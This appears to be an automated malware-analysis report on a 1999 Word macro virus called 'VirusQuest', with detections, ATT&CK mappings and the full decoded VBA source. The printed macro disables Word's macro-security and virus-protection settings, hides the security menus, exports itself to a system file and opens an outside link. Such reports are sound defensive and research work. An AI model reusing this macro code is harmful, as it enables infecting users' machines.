MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1566.001 Spearphishing Attachment
T1059.005 Visual Basic
T1204.002 Malicious Link
The sample is a malicious Word document containing VBA macros. The macro attempts to disable security features and then executes a hyperlink to 'http://www.jring.inter.net/'. It also attempts to export itself as 'c:\VirusQuest.sys', suggesting a downloader or dropper functionality. The ClamAV detections 'Win.Trojan.Psycho-3' and 'Win.Trojan.wmvg-1' further indicate malicious intent.
Heuristics 3
-
ClamAV: Win.Trojan.Psycho-3 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Trojan.Psycho-3
-
VBA macros detected medium OLE_VBA_MACROSDocument contains VBA macro code
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.jring.inter.net/ In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1910 bytes |
SHA-256: 77a176e87e2b77f27dda07575ca992c5bec478827c439425220fab50fe7bfb15 |
|||
|
Detection
ClamAV:
Win.Trojan.wmvg-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "VirusQuest"
'======================================================
' VirusQuest by Dr Virus Quest
' Origin from Malaysia
' Copyright©1999
'======================================================
Public Skip As Integer
Private Sub VirusQuest()
On Error Resume Next
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Else
CommandBars("Tools").Controls("Macro").Enabled = False
Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1)
End If
Application.ScreenUpdating = False
Options.ConfirmConversions = False
Options.VirusProtection = False
Options.SaveNormalPrompt = False
Application.VBE.ActiveVBProject.VBComponents("VirusQuest").Export "c:\VirusQuest.sys"
ActiveDocument.ReadOnlyRecommended = False
With Dialogs(wdDialogFileSummaryInfo)
.Author = "Dr Virus Quest"
.Execute
End With
ActiveDocument.FollowHyperlink Address:= _
"http://www.jring.inter.net/" _
, NewWindow:=False, AddHistory:=True
End Sub
Private Sub Effect()
On Error Resume Next
If Day(Date) = "1" Then
Assistant.Visible = True
With Assistant.NewBalloon
.Icon = msoIconAlert
.Text = "Author: Dr Virus Quest"
.Heading = "VirusQuest"
.Animation = msoAnimationSearching
.Show
End With
MsgBox "Thanks friends", vbOKOnly, "VirusQuest"
Else
End If
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.